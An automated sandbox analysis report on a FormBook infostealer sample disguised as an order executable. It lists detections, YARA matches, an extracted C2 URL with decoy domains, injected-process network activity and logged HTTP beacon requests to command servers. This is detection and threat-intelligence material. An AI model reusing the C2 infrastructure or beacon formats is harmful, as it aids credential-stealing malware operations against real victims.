Windows Analysis Report Order No00020212910.exe

AV Detection:

Found malware configuration

Source: 00000005.00000002.358557026.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.lasnochesdeluces.com/ng6c/"], "decoy": ["ayeghkarialmahdi.com", "xpatfone.com", "doctorsilkroad.com", "ivegotthat.com", "letsguthappy.com", "xrxgqf.website", "northlakelogisticspark.com", "iseewhatyourmean.space", "animalsmeme.net", "webuywholesalerhouses.com", "946abp.net", "fitnsfreak.com", "beautyloungeacademyllc.com", "chuyistudio.com", "koiclean.com", "oneupcobra.net", "cleversights.com", "viniciusshop.com", "roonkingagency.online", "pentooloffice.com", "dapaotang0.xyz", "dress-ads.com", "malgorzata-lac.com", "shoppingvipshopping.space", "mar.cruises", "motivational-hub.com", "4217193.win", "collegedalerealtor.com", "keylinktosolutions.com", "longlivesela.com", "xso94.top", "lalocandaonline.com", "thebootyteasisterhood.com", "varzeshbanovans.com", "resonators-and.com", "geodigraph.coop", "retrosvoiture.com", "qiuma.net", "caringhearts.asia", "mgav99.xyz", "daliborkokic.com", "wtfong.com", "caprockiic.com", "pgonline555.online", "baxin.net", "ezo-magik.store", "renewueye.com", "deepideaconsulting.com", "timmyben.com", "pavitrafabtech.com", "ohsodolc.com", "lemesdev.com", "senseyestore.com", "multivisaorepresentacao.com", "ferasan.com", "wholenessdiagram.com", "smelltraining.club", "lifestylearch.com", "harryrowlandart.com", "bigceme3.com", "rittmarshausen.net", "day-mutual.com", "inkedbreadco.com", "craftycatmull.com"]}

Multi AV Scanner detection for submitted file

Source: Order No00020212910.exe

Virustotal: Detection: 24%

Perma Link

Yara detected FormBook

Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Order No00020212910.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Order No00020212910.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Order No00020212910.exe.3cffe30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.360093784.00000000012A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.358557026.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.359113486.0000000000F30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.286837768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.538894457.0000000002DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.331858706.000000000FC45000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.538763652.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290527525.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.537812655.0000000000B10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.317344096.000000000FC45000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.287427426.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Machine Learning detection for sample

Source: Order No00020212910.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 5.0.Order No00020212910.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.Order No00020212910.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.Order No00020212910.exe.400000.8.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.Order No00020212910.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: Order No00020212910.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Order No00020212910.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: netstat.pdbGCTL source: Order No00020212910.exe, 00000005.00000002.359158695.0000000000F60000.00000040.00020000.sdmp
Source:	Binary string: netstat.pdb source: Order No00020212910.exe, 00000005.00000002.359158695.0000000000F60000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Order No00020212910.exe, 00000005.00000002.359186565.0000000000F70000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000E.00000002.541418098.00000000038EF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Order No00020212910.exe, NETSTAT.EXE

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 4x nop then pop esi		5_2_00415821
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 4x nop then pop edi		5_2_004162F0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 4x nop then pop edi		5_2_00415686
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 4x nop then pop esi		14_2_00B25821
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 4x nop then pop edi		14_2_00B262F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 4x nop then pop edi		14_2_00B25686

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49815 -> 34.98.99.30:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49815 -> 34.98.99.30:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49815 -> 34.98.99.30:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 74.220.219.155:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 74.220.219.155:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 74.220.219.155:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.beautyloungeacademyllc.com
Source: C:\Windows\explorer.exe	Domain query: www.collegedalerealtor.com
Source: C:\Windows\explorer.exe	Domain query: www.inkedbreadco.com
Source: C:\Windows\explorer.exe	Network Connect: 34.98.99.30 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 74.220.199.6 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 44.227.76.166 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.xpatfone.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.xrxgqf.website
Source: C:\Windows\explorer.exe	Domain query: www.shoppingvipshopping.space
Source: C:\Windows\explorer.exe	Domain query: www.lasnochesdeluces.com

Uses netstat to query active network connections and open ports

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.lasnochesdeluces.com/ng6c/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /ng6c/?n87xKt=eTNPRcwwgHJu+ztik5FR6WEVQXMPsMKKvKIaNBiNk9xxGwn0sgQR4Omx9AGkAwkJPdqZ&3fs8=7nB4LhYH HTTP/1.1Host: www.inkedbreadco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ng6c/?n87xKt=QK0eY45OxUyc4Ytk5lUqhd7fpJYow4bz7iPp6Y4xtBWfe/8BFN1G/o4M7OI98LSuiB2U&3fs8=7nB4LhYH HTTP/1.1Host: www.xrxgqf.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ng6c/?n87xKt=BIGY07QLXhzrGEPrN5TMQ+GQMkNh6T9moM8B1IFcGHmMBIb3S5gzA33xEH70m79GvSww&3fs8=7nB4LhYH HTTP/1.1Host: www.xpatfone.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ng6c/?n87xKt=x9dHvUGvpchYPBT7VwuO56uIXLHJpDRZByO6Leav9okJR9tMfFR62Q+ZLp4qF5rGLwf5&3fs8=7nB4LhYH HTTP/1.1Host: www.collegedalerealtor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ng6c/?n87xKt=ejUrfSiI2rbA4rKmHAIV6gBQeeD+hJ/4mMGWNn0SrfgkLPq4Q2wY4xAxq5Ra/NRyIx4H&3fs8=7nB4LhYH HTTP/1.1Host: www.lasnochesdeluces.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 198.185.159.144 198.185.159.144
Source: Joe Sandbox View	IP Address: 74.220.199.6 74.220.199.6

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 29 Oct 2021 02:24:27 GMTContent-Type: text/htmlContent-Length: 275ETag: "61704eb2-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 29 Oct 2021 02:24:32 GMTContent-Type: text/htmlContent-Length: 275ETag: "6169a6e7-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

URLs found in memory or binary data

Source: NETSTAT.EXE, 0000000E.00000002.542198796.0000000003E82000.00000004.00020000.sdmp	String found in binary or memory: http://collegedalerealtor.com
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Order No00020212910.exe, 00000000.00000002.292344503.0000000007AC0000.00000004.00020000.sdmp	String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.inkedbreadco.com

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /ng6c/?n87xKt=eTNPRcwwgHJu+ztik5FR6WEVQXMPsMKKvKIaNBiNk9xxGwn0sgQR4Omx9AGkAwkJPdqZ&3fs8=7nB4LhYH HTTP/1.1Host: www.inkedbreadco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ng6c/?n87xKt=QK0eY45OxUyc4Ytk5lUqhd7fpJYow4bz7iPp6Y4xtBWfe/8BFN1G/o4M7OI98LSuiB2U&3fs8=7nB4LhYH HTTP/1.1Host: www.xrxgqf.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ng6c/?n87xKt=BIGY07QLXhzrGEPrN5TMQ+GQMkNh6T9moM8B1IFcGHmMBIb3S5gzA33xEH70m79GvSww&3fs8=7nB4LhYH HTTP/1.1Host: www.xpatfone.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ng6c/?n87xKt=x9dHvUGvpchYPBT7VwuO56uIXLHJpDRZByO6Leav9okJR9tMfFR62Q+ZLp4qF5rGLwf5&3fs8=7nB4LhYH HTTP/1.1Host: www.collegedalerealtor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ng6c/?n87xKt=ejUrfSiI2rbA4rKmHAIV6gBQeeD+hJ/4mMGWNn0SrfgkLPq4Q2wY4xAxq5Ra/NRyIx4H&3fs8=7nB4LhYH HTTP/1.1Host: www.lasnochesdeluces.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)

Source: Order No00020212910.exe, 00000000.00000002.290003592.0000000001048000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Order No00020212910.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Order No00020212910.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Order No00020212910.exe.3cffe30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.360093784.00000000012A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.358557026.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.359113486.0000000000F30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.286837768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.538894457.0000000002DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.331858706.000000000FC45000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.538763652.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290527525.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.537812655.0000000000B10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.317344096.000000000FC45000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.287427426.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 5.0.Order No00020212910.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Order No00020212910.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Order No00020212910.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Order No00020212910.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Order No00020212910.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Order No00020212910.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Order No00020212910.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Order No00020212910.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Order No00020212910.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Order No00020212910.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Order No00020212910.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Order No00020212910.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Order No00020212910.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Order No00020212910.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Order No00020212910.exe.3cffe30.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Order No00020212910.exe.3cffe30.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.360093784.00000000012A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.360093784.00000000012A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.358557026.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.358557026.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.359113486.0000000000F30000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.359113486.0000000000F30000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.286837768.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.286837768.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.538894457.0000000002DB0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.538894457.0000000002DB0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.331858706.000000000FC45000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.331858706.000000000FC45000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.538763652.0000000002D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.538763652.0000000002D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.290527525.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.290527525.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.537812655.0000000000B10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.537812655.0000000000B10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.317344096.000000000FC45000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.317344096.000000000FC45000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.287427426.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.287427426.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Order No00020212910.exe

Uses 32bit PE files

Source: Order No00020212910.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 5.0.Order No00020212910.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Order No00020212910.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Order No00020212910.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
